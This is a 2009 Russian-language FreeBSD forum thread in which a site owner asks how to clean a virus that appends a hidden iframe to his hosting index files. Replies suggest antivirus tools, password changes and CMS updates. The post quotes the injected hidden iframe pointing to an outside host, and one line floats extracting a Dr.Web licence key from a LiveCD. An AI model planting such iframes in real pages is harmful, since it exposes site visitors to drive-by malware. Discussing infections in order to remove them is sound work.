Подскажите чем удалить вирус

Проблемы установки, настройки и работы Правильной Операционной Системы

Модератор: terminus

Правила форума
Убедительная просьба юзать теги [cоde] при оформлении листингов.
Сообщения не оформленные должным образом имеют все шансы быть незамеченными.
Аватара пользователя
sergio
мл. сержант
Сообщения: 79
Зарегистрирован: 2006-12-30 2:47:28
Откуда: Русь Києвська

Подскажите чем удалить вирус

Непрочитанное сообщение sergio » 2009-07-31 18:49:49

У меня на хостинге вирус.
Судя по всему пароли к ftp с клиентской тачки спёр какой-нибудь троян.

Лазит себе вирусняк по хостинговой дире, и в index.* и дописывает что-то типа:

Код: Выделить всё

<iframe src="http://xb6.ru:8080/index.php" width=140 height=137 style="visibility: hidden"></iframe>
Clamav его в упор не видит.

Есть ли бесплатный антивырь чтоб его изловить мог, да файлы почистить. Ато задолбался восстанавливать.

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Аватара пользователя
ban
мл. сержант
Сообщения: 145
Зарегистрирован: 2009-07-22 22:36:29
Откуда: г.Волжский Волг. обл.

Re: Подскажите чем удалить вирус

Непрочитанное сообщение ban » 2009-07-31 19:26:10

1) Качаешь Dr.Web LiveCD (сканирование рабочих станций и серверов под управлением Windows\Unix) собран на каком-то дистрибутиве линуксовом
ftp://ftp.drweb.com/pub/drweb/livecd/20 ... -5.0.0.iso

2) Грузишься, монтируешь раздел FreeBSD - сканируешь, провод сетевой не забудь отцепить на всякий случай
Вопрос монтирования освещен тут: Как смонтировать раздел FreeBSD под Linux?


Сам не пробовал такую схему, но почему бы не попробовать если других вариантов конечно не предложат.
Кстати, базы Dr.Web'овские в обозначенном образе должны быть по вчерашнее число, так что осталось только смонтироваться...

Если получится что, отпишись пожалуйста для потомков :)
кто никуда не торопится, тот везде успевает

princeps
майор
Сообщения: 2684
Зарегистрирован: 2007-09-25 10:20:59
Откуда: Сочи, Москва
Контактная информация:

Re: Подскажите чем удалить вирус

Непрочитанное сообщение princeps » 2009-07-31 19:47:00

sergio писал(а): Судя по всему пароли к ftp с клиентской тачки спёр какой-нибудь троян.

Лазит себе вирусняк по хостинговой дире, и в index.* и дописывает что-то типа:
sergio писал(а):Ато задолбался восстанавливать.
А поменять пароль на ftp не судьба? И последние обновления накатить, особенно на CMS.
Deus quos vult perdere dementat prius
http://www.itforum-sochi.ru

Аватара пользователя
sergio
мл. сержант
Сообщения: 79
Зарегистрирован: 2006-12-30 2:47:28
Откуда: Русь Києвська

Re: Подскажите чем удалить вирус

Непрочитанное сообщение sergio » 2009-07-31 19:55:08

А поменять пароль на ftp не судьба?
Уже

Аватара пользователя
sergio
мл. сержант
Сообщения: 79
Зарегистрирован: 2006-12-30 2:47:28
Откуда: Русь Києвська

Re: Подскажите чем удалить вирус

Непрочитанное сообщение sergio » 2009-07-31 20:00:04

ban Спасибо, попробую.
Хочу ещё попробовать оттуда ключ для DrWeb вытянуть. Он ведь может подойти к тому что в портах лежит?

Аватара пользователя
goshanecr
сержант
Сообщения: 252
Зарегистрирован: 2008-03-31 15:54:49
Откуда: Пермь, Екатеринбург
Контактная информация:

Re: Подскажите чем удалить вирус

Непрочитанное сообщение goshanecr » 2009-07-31 22:36:13

Мне кажется что кламав и не должен видеть этот вирь и никакой другой антивирь его тоже не увидит.. Может он работает по принципу:
С клиентского компа узнаётся логин/пасс к хостингу, и затем удалённо этот скрипт просто используя логин пасс уже дописывает абсолютно безобидный для любого антивируса представленный тобой HTML код.. Может я и не прав, но мне кажется так..
Люблю в инете шарить. И браузер мой только Opera !!!
Пользователям стараюсь ставить дистр Ubuntu. Уже 3 человека пересели.
Домашний комп FreeBSD 9.0 amd64
FreeBSD - изменим жизнь к лучшему!

princeps
майор
Сообщения: 2684
Зарегистрирован: 2007-09-25 10:20:59
Откуда: Сочи, Москва
Контактная информация:

Re: Подскажите чем удалить вирус

Непрочитанное сообщение princeps » 2009-08-01 9:40:56

в большинстве случаев описанная тредстартером ситуация происходит, когда вирус юзает уязвимость в cms.
goshanecr писал(а):Мне кажется что кламав и не должен видеть этот вирь и никакой другой антивирь его тоже не увидит..
Я как-то сталкивался с подобным, делал следующим образом - каталог www копировал с хостинга к себе на комп с виндой и каспер отлично видел вирус и мочил его.
Кстати, вирусу, как я понимаю, не обязательно красть пароли, он теоретически может заражать сайт во время ftp-сессии с зараженной клиенсткой машины.
Deus quos vult perdere dementat prius
http://www.itforum-sochi.ru